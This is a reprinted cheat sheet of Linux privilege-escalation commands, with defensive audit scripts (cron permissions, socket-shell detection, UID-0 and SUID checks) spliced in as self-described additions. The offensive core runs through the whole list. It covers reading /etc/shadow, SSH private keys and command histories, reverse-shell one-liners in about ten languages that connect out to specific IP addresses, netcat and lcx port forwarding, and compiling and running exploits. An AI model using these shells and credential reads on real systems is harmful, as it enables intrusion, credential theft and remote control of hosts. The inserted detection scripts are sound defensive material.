Common command set for Linux privilege escalation

Source: Internet
Author: User

Reprint: http://www.myhack58.com/Article/html/3/8/2017/83236.htm

0x00 Operating system related

Operating system type and version

    1. cat /etc/issue
    2. cat /etc/*-release
    3. cat /etc/lsb-release   # Debian
    4. cat /etc/redhat-release   # Redhat

Kernel version and whether it is 64-bit

    1. cat /proc/version
    2. uname -a
    3. uname -mrs
    4. rpm -q kernel
    5. dmesg | grep Linux
    6. ls /boot | grep vmlinuz-

Environment variables

    1. cat /etc/profile
    2. cat /etc/bashrc
    3. cat ~/.bash_profile
    4. cat ~/.bashrc
    5. cat ~/.bash_logout
    6. env
    7. set

See if a printer is available

    1. lpstat -a

0x01 Applications and services

View running processes and the users they run as

    1. ps aux
    2. ps -ef
    3. top
    4. cat /etc/services

Processes running with root privileges

    1. ps aux | grep root
    2. ps -ef | grep root

View installed applications

    1. ls -alh /usr/bin/
    2. ls -alh /sbin/
    3. dpkg -l
    4. rpm -qa
    5. ls -alh /var/cache/apt/archives
    6. ls -alh /var/cache/yum/

Configuration files of common services

    1. cat /etc/syslog.conf
    2. cat /etc/chttp.conf
    3. cat /etc/lighttpd.conf
    4. cat /etc/cups/cupsd.conf
    5. cat /etc/inetd.conf
    6. cat /etc/apache2/apache2.conf
    7. cat /etc/my.conf
    8. cat /etc/httpd/conf/httpd.conf
    9. cat /opt/lampp/etc/httpd.conf
    10. ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'   # entries under /etc with any read bit set

Scheduled tasks

    1. crontab -l
    2. ls -alh /var/spool/cron
    3. ls -al /etc/ | grep cron
    4. ls -al /etc/cron*
    5. cat /etc/cron*
    6. cat /etc/at.allow
    7. cat /etc/at.deny
    8. cat /etc/cron.allow
    9. cat /etc/cron.deny
    10. cat /etc/crontab
    11. cat /etc/anacrontab
    12. cat /var/spool/cron/crontabs/root
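A defender-side check that joins the crontab listings above with the file-permission searches further down the page. This is an added example and not part of the original article: it parses a constructed system-style crontab (the format with a user column), pulls out each job's program path, and reports any that are world-writable, which is the cron misconfiguration these listings are meant to surface. The sample crontab and job scripts are constructed in a temporary directory; `cron_commands` and `world_writable_cron_targets` are names chosen for this example.

```sh
#!/bin/sh
# Added example: audit a system-style crontab for world-writable job scripts.
# Everything below is constructed sample data, not taken from a real host.
export LC_ALL=C
WORKDIR=$(mktemp -d)
mkdir -p "$WORKDIR/scripts"

# Two job scripts: one with sane permissions, one world-writable (the misconfiguration).
printf '#!/bin/sh\necho backup\n' > "$WORKDIR/scripts/backup.sh"
chmod 755 "$WORKDIR/scripts/backup.sh"
printf '#!/bin/sh\necho cleanup\n' > "$WORKDIR/scripts/cleanup.sh"
chmod 777 "$WORKDIR/scripts/cleanup.sh"

# Constructed /etc/crontab-style file: comments, variable assignments, and two jobs.
cat > "$WORKDIR/crontab" <<EOF
# m h dom mon dow user command
SHELL=/bin/sh
PATH=/usr/bin:/bin
*/5 * * * * root $WORKDIR/scripts/backup.sh
0 3 * * * root $WORKDIR/scripts/cleanup.sh --force
EOF

# Print the program path of each job line (field 7 in a crontab with a user column),
# skipping comments, blank lines and VAR=value assignments.
cron_commands() {
    awk '!/^[[:space:]]*#/ && !/^[[:space:]]*$/ && !/^[A-Za-z_][A-Za-z0-9_]*=/ && NF >= 7 { print $7 }' "$1"
}

# Report job programs that exist as regular files and carry the other-write bit.
# find -perm -o=w is used instead of stat(1) because stat's flags differ between GNU and BSD.
world_writable_cron_targets() {
    cron_commands "$1" | while read -r prog; do
        [ -f "$prog" ] || continue
        if [ -n "$(find "$prog" -perm -o=w 2>/dev/null)" ]; then
            echo "$prog"
        fi
    done
}

world_writable_cron_targets "$WORKDIR/crontab"
```

On a live host, point `world_writable_cron_targets` at /etc/crontab and each file under /etc/cron.d; user crontabs under /var/spool/cron have no user column, so the field index would be 6 there. A job whose script is world-writable lets any local user choose what runs as that job's user, so the right fix is to tighten the script's mode, not to delete the job.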

Find stored plaintext user names and passwords

    1. grep -i user [filename]
    2. grep -i pass [filename]
    3. grep -C 5 "password" [filename]
    4. find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # Joomla

0x02 Communication and network related

View current network addresses

    1. /sbin/ifconfig -a
    2. cat /etc/network/interfaces
    3. cat /etc/sysconfig/network

View network configuration: DNS, DHCP, gateways

    1. cat /etc/resolv.conf
    2. cat /etc/sysconfig/network
    3. cat /etc/networks
    4. iptables -L
    5. hostname
    6. dnsdomainname

View network traffic

    1. lsof -i
    2. lsof -i :80
    3. grep 80 /etc/services
    4. netstat -antup
    5. netstat -antpx
    6. netstat -tulpn
    7. chkconfig --list
    8. chkconfig --list | grep 3:on
    9. last
    10. w

View ARP cache and routing table

    1. arp -e
    2. route
    3. /sbin/route -nee

tcpdump

    1. tcpdump '(tcp and dst host 192.168.1.7) or (tcp and dst host 10.2.2.222 and dst port 21)'

tcpdump '(tcp and dst host [IP] and dst port [port]) or (tcp and dst host [IP] and dst port [port])'   # pcap filter syntax; the parentheses keep each host/port pair together

Interactive shell

Bash version:

    1. bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl version:

    1. perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python version:

    1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP version:

    1. php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby version:

    1. ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc version:

    1. nc -e /bin/sh 223.8.200.234 1234

nc without -e:

    1. mknod /tmp/backpipe p
    2. /bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe

mknod with telnet:

    1. mknod backpipe p && telnet 173.214.173.151 8080 0<backpipe | /bin/sh 1>backpipe

Java version (Groovy syntax):

    1. r = Runtime.getRuntime()
    2. p = r.exec(["/bin/bash", "-c", "exec 5<>/dev/tcp/202.103.243.122/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
    3. p.waitFor()

Lua version:

    1. lua -e "require('socket');require('os');t=socket.tcp();t:connect('202.103.243.122','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
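Every one-liner above ends in the same state: a shell whose standard input, output and error are all attached to a network socket, and that state is what makes them visible on the host. The following is an added example and not from the original article: a POSIX sh function that walks a /proc-style tree, reads each process's `comm` name, and flags shell interpreters whose file descriptors 0, 1 and 2 all resolve to `socket:[inode]` links. It assumes Linux's /proc layout (`/proc/<pid>/comm` and the `/proc/<pid>/fd/N` symlinks); so that it runs anywhere, the block builds a constructed fake tree in a temporary directory instead of reading the live /proc. `find_socket_shells` is a name chosen for this example.

```sh
#!/bin/sh
# Added example: flag shells whose stdin/stdout/stderr are all sockets, the footprint
# of the reverse-shell one-liners above. Pass /proc on a live Linux host, or a
# constructed tree as built below for demonstration.
find_socket_shells() {
    root="${1:-/proc}"
    for pid_dir in "$root"/[0-9]*; do
        [ -d "$pid_dir/fd" ] || continue
        pname=$(cat "$pid_dir/comm" 2>/dev/null)
        # Only shell interpreters are of interest; daemons legitimately hold sockets on 0-2.
        case "$pname" in
            sh|bash|dash|zsh|ksh) ;;
            *) continue ;;
        esac
        hits=0
        for n in 0 1 2; do
            case "$(readlink "$pid_dir/fd/$n" 2>/dev/null)" in
                socket:*) hits=$((hits + 1)) ;;
            esac
        done
        if [ "$hits" -eq 3 ]; then
            echo "${pid_dir##*/} $pname"
        fi
    done
}

# Constructed fake /proc tree (sample data, not a real host).
FAKE_PROC=$(mktemp -d)
# pid 4242: a shell with all three standard fds on the same socket (suspicious).
mkdir -p "$FAKE_PROC/4242/fd"
printf 'sh\n' > "$FAKE_PROC/4242/comm"
for n in 0 1 2; do ln -s 'socket:[31337]' "$FAKE_PROC/4242/fd/$n"; done
# pid 1234: an ordinary interactive shell on a pseudo-terminal (benign).
mkdir -p "$FAKE_PROC/1234/fd"
printf 'bash\n' > "$FAKE_PROC/1234/comm"
for n in 0 1 2; do ln -s '/dev/pts/0' "$FAKE_PROC/1234/fd/$n"; done
# pid 777: a network daemon with socket fds but not a shell (benign).
mkdir -p "$FAKE_PROC/777/fd"
printf 'nginx\n' > "$FAKE_PROC/777/comm"
for n in 0 1 2; do ln -s 'socket:[99]' "$FAKE_PROC/777/fd/$n"; done

find_socket_shells "$FAKE_PROC"
```

On a real host the fd links of other users' processes are only readable as root, so run this from a privileged agent or cron job. The check is a heuristic: a shell driven by a legitimate remote tool (some orchestration agents do this) will also match, so pair a hit with the owning process tree and the peer address from `ss -tnp` or `lsof -i` before acting on it.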

Port forwarding

lcx -<listen|tran|slave>

    1. lcx -listen 4567 33891   # on the attacker host
    2. lcx -slave 111.222.333.444 4567 127.0.0.1 3389   # on the target

ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

    1. ssh -L 8080:127.0.0.1:80 [user]@[ip]   # local port forward
    2. ssh -R 8080:127.0.0.1:80 [user]@[ip]   # remote port forward

mknod backpipe p; nc -l -p [remote port] < backpipe | nc [local IP] [local port] > backpipe

    1. mknod backpipe p; nc -l -p 8080 < backpipe | nc 10.1.1.251 [local port] > backpipe
    2. mknod backpipe p; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe   # proxy (port 8080)
    3. mknod backpipe p; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe   # proxy monitor (port 8080)

Tunnel

    1. ssh -D 127.0.0.1:9050 -N [username]@[ip]
    2. proxychains ifconfig

0x03 User related

User information

    1. id
    2. who
    3. w
    4. last
    5. cat /etc/passwd
    6. cat /etc/group
    7. cat /etc/shadow
    8. ls -alh /var/mail/
    9. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1 }'   # list super users
    10. awk -F: '($3 == "0") {print}' /etc/passwd   # list super users
    11. cat /etc/sudoers
    12. sudo -l
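The two awk one-liners above answer one question, which accounts have UID 0, and it is worth turning that into a repeatable check. The following is an added example and not from the original article: it runs over a constructed passwd-format file (written to a temporary file, so nothing on the real host is read), lists UID-0 accounts, counts them, and separately lists the accounts that still have an interactive login shell, which is what a reviewer of /etc/passwd is usually after. `list_uid0`, `count_uid0` and `list_login_shells` are names chosen for this example.

```sh
#!/bin/sh
# Added example: repeatable checks over a passwd-format file.
# The sample below is constructed and does not describe any real host.
SAMPLE_PASSWD=$(mktemp)
cat > "$SAMPLE_PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
# a comment line, which the grep -v below discards
toor:x:0:0:second UID-0 account:/root:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
svc:x:999:999:service account:/var/lib/svc:/bin/false
EOF

# Every account whose numeric UID is 0 (the same test as the awk one-liners above).
list_uid0() {
    grep -v -E '^#' "$1" | awk -F: '$3 == 0 { print $1 }'
}

# Number of UID-0 accounts; more than one is a finding on a hardened host.
count_uid0() {
    list_uid0 "$1" | wc -l | tr -d ' '
}

# Accounts whose login shell is not nologin or false, printed as name:shell.
list_login_shells() {
    grep -v -E '^#' "$1" | awk -F: '$7 !~ /\/(nologin|false)$/ { print $1 ":" $7 }'
}

list_uid0 "$SAMPLE_PASSWD"
count_uid0 "$SAMPLE_PASSWD"
list_login_shells "$SAMPLE_PASSWD"
```

Run the same functions against /etc/passwd on a real host; a second UID-0 entry or a service account with /bin/bash are both worth a ticket. Note that the shell test only looks at field 7, so an account locked in /etc/shadow (a `!` or `*` hash) still appears in the list, which is the conservative side to err on.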

List of home directories

    1. ls -ahlR /root/
    2. ls -ahlR /home/

Find passwords in configuration files

    1. cat /var/apache2/config.inc
    2. cat /var/lib/mysql/mysql/user.MYD
    3. cat /root/anaconda-ks.cfg

View other users' command history

    1. cat ~/.bash_history
    2. cat ~/.nano_history
    3. cat ~/.atftp_history
    4. cat ~/.mysql_history
    5. cat ~/.php_history

SSH keys and configuration

    1. cat ~/.ssh/authorized_keys
    2. cat ~/.ssh/identity.pub
    3. cat ~/.ssh/identity
    4. cat ~/.ssh/id_rsa.pub
    5. cat ~/.ssh/id_rsa
    6. cat ~/.ssh/id_dsa.pub
    7. cat ~/.ssh/id_dsa
    8. cat /etc/ssh/ssh_config
    9. cat /etc/ssh/sshd_config
    10. cat /etc/ssh/ssh_host_dsa_key.pub
    11. cat /etc/ssh/ssh_host_dsa_key
    12. cat /etc/ssh/ssh_host_rsa_key.pub
    13. cat /etc/ssh/ssh_host_rsa_key
    14. cat /etc/ssh/ssh_host_key.pub
    15. cat /etc/ssh/ssh_host_key

0x04 File system related

Files under /etc/

    1. ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null   # any write bit set (owner, group or other)
    2. ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null   # owner-writable
    3. ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null   # group-writable
    4. ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null   # world-writable
    5. find /etc/ -readable -type f 2>/dev/null   # readable by the current user
    6. find /etc/ -maxdepth 1 -readable -type f 2>/dev/null   # readable by the current user, top level only

Log files

    1. ls -alh /var/log
    2. ls -alh /var/mail
    3. ls -alh /var/spool
    4. ls -alh /var/spool/lpd
    5. ls -alh /var/lib/pgsql
    6. ls -alh /var/lib/mysql
    7. cat /var/lib/dhcp3/dhclient.leases

View web site files

    1. ls -alhR /var/www/
    2. ls -alhR /srv/www/htdocs/
    3. ls -alhR /usr/local/www/apache22/data/
    4. ls -alhR /opt/lampp/htdocs/
    5. ls -alhR /var/www/html/

Common log files

    1. cat /etc/httpd/logs/access_log
    2. cat /etc/httpd/logs/access.log
    3. cat /etc/httpd/logs/error_log
    4. cat /etc/httpd/logs/error.log
    5. cat /var/log/apache2/access_log
    6. cat /var/log/apache2/access.log
    7. cat /var/log/apache2/error_log
    8. cat /var/log/apache2/error.log
    9. cat /var/log/apache/access_log
    10. cat /var/log/apache/access.log
    11. cat /var/log/auth.log
    12. cat /var/log/chttp.log
    13. cat /var/log/cups/error_log
    14. cat /var/log/dpkg.log
    15. cat /var/log/faillog
    16. cat /var/log/httpd/access_log
    17. cat /var/log/httpd/access.log
    18. cat /var/log/httpd/error_log
    19. cat /var/log/httpd/error.log
    20. cat /var/log/lastlog
    21. cat /var/log/lighttpd/access.log
    22. cat /var/log/lighttpd/error.log
    23. cat /var/log/lighttpd/lighttpd.access.log
    24. cat /var/log/lighttpd/lighttpd.error.log
    25. cat /var/log/messages
    26. cat /var/log/secure
    27. cat /var/log/syslog
    28. cat /var/log/wtmp
    29. cat /var/log/xferlog
    30. cat /var/log/yum.log
    31. cat /var/run/utmp
    32. cat /var/webmin/miniserv.log
    33. cat /var/www/logs/access_log
    34. cat /var/www/logs/access.log
    35. ls -alh /var/lib/dhcp3/
    36. ls -alh /var/log/postgresql/
    37. ls -alh /var/log/proftpd/
    38. ls -alh /var/log/samba/

Mounted file systems

    1. mount
    2. df -h
    3. cat /etc/fstab

find commands

    1. find / -perm -1000 -type d 2>/dev/null   # sticky bit: only a file's owner (or the directory owner) can delete or rename it there
    2. find / -perm -g=s -type f 2>/dev/null   # SGID (chmod 2000): runs as the group, not the user who started it
    3. find / -perm -u=s -type f 2>/dev/null   # SUID (chmod 4000): runs as the owner, not the user who started it
    4. find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null   # SGID or SUID (parentheses keep -type f applying to both)
    5. for i in $(locate -r "bin$"); do find "$i" \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done   # looks in /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other bin directory
    6. find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null   # from /, find SGID or SUID files, excluding symbolic links, to a depth of 3 directories, with a detailed listing and error messages suppressed
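The SUID/SGID searches above produce a list; what a defender wants to know is when that list changes. The following is an added example and not from the original article: it compares a recorded baseline of setuid/setgid paths with a fresh scan using comm(1) and prints what appeared and what disappeared. `scan_setuid` wraps the same find expression as item 5 above for use on a live host; for the demonstration both lists are constructed inline and written to temporary files, so no real system is scanned, and the paths in the sample lists are made up. `scan_setuid`, `new_setuid` and `missing_setuid` are names chosen for this example.

```sh
#!/bin/sh
# Added example: detect drift in the set of SUID/SGID files against a baseline.
export LC_ALL=C   # comm(1) needs both inputs sorted in the same collation

# Live scan helper (not exercised by the sample below): SUID or SGID regular files,
# staying on one file system, sorted for comm(1).
scan_setuid() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Paths in the current scan that are absent from the baseline (new privileged binaries).
new_setuid() {
    comm -13 "$1" "$2"
}

# Paths in the baseline that are no longer present (removed or de-privileged).
missing_setuid() {
    comm -23 "$1" "$2"
}

# Constructed sample data: a baseline taken at build time and a later scan.
BASELINE=$(mktemp)
CURRENT=$(mktemp)
printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/mount /usr/bin/chsh | sort > "$BASELINE"
printf '%s\n' /usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/mount /tmp/rogue-helper /usr/local/bin/backup | sort > "$CURRENT"

echo "new:";     new_setuid "$BASELINE" "$CURRENT"
echo "missing:"; missing_setuid "$BASELINE" "$CURRENT"
```

In practice the baseline is produced with `scan_setuid` on a freshly built image and stored off the host, and a cron job or agent runs `new_setuid` against a fresh scan and alerts on any output. Comparing paths alone misses a binary that was replaced in place, so a stronger version records a hash per path as well.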

Find writable directories

    1. find / -writable -type d 2>/dev/null   # directories writable by the current user
    2. find / -perm -222 -type d 2>/dev/null   # directories with all three write bits set
    3. find / -perm -o=w -type d 2>/dev/null   # world-writable directories
    4. find / -perm -o=x -type d 2>/dev/null   # world-executable (searchable) directories
    5. find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null   # world-writable and executable directories

Find files

    1. find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print 2>/dev/null   # world-writable directories without the sticky bit
    2. find /dir -xdev \( -nouser -o -nogroup \) -print 2>/dev/null   # files with no owner or group

0x05 Preparation and attack

View available languages and compilers

    1. find / -name "perl*"
    2. find / -name "python*"
    3. find / -name "gcc*"
    4. find / -name cc

View available upload tools

    1. find / -name wget
    2. find / -name "nc*"
    3. find / -name "netcat*"
    4. find / -name "tftp*"
    5. find / -name ftp

Find exploits

http://www.exploit-db.com
http://1337day.com
http://www.securiteam.com
http://www.securityfocus.com
http://www.exploitsearch.net
http://metasploit.com/modules/
http://securityreason.com
http://seclists.org/fulldisclosure/
http://www.google.com

Compiling an exploit

    1. which gcc
    2. gcc exp.c -o exp

Run

    1. chmod +x exp
    2. ./exp

0x06 Privilege escalation helper scripts

LinEnum

linuxprivchecker.py

This list is not exhaustive and may contain errors; corrections and additions are welcome.

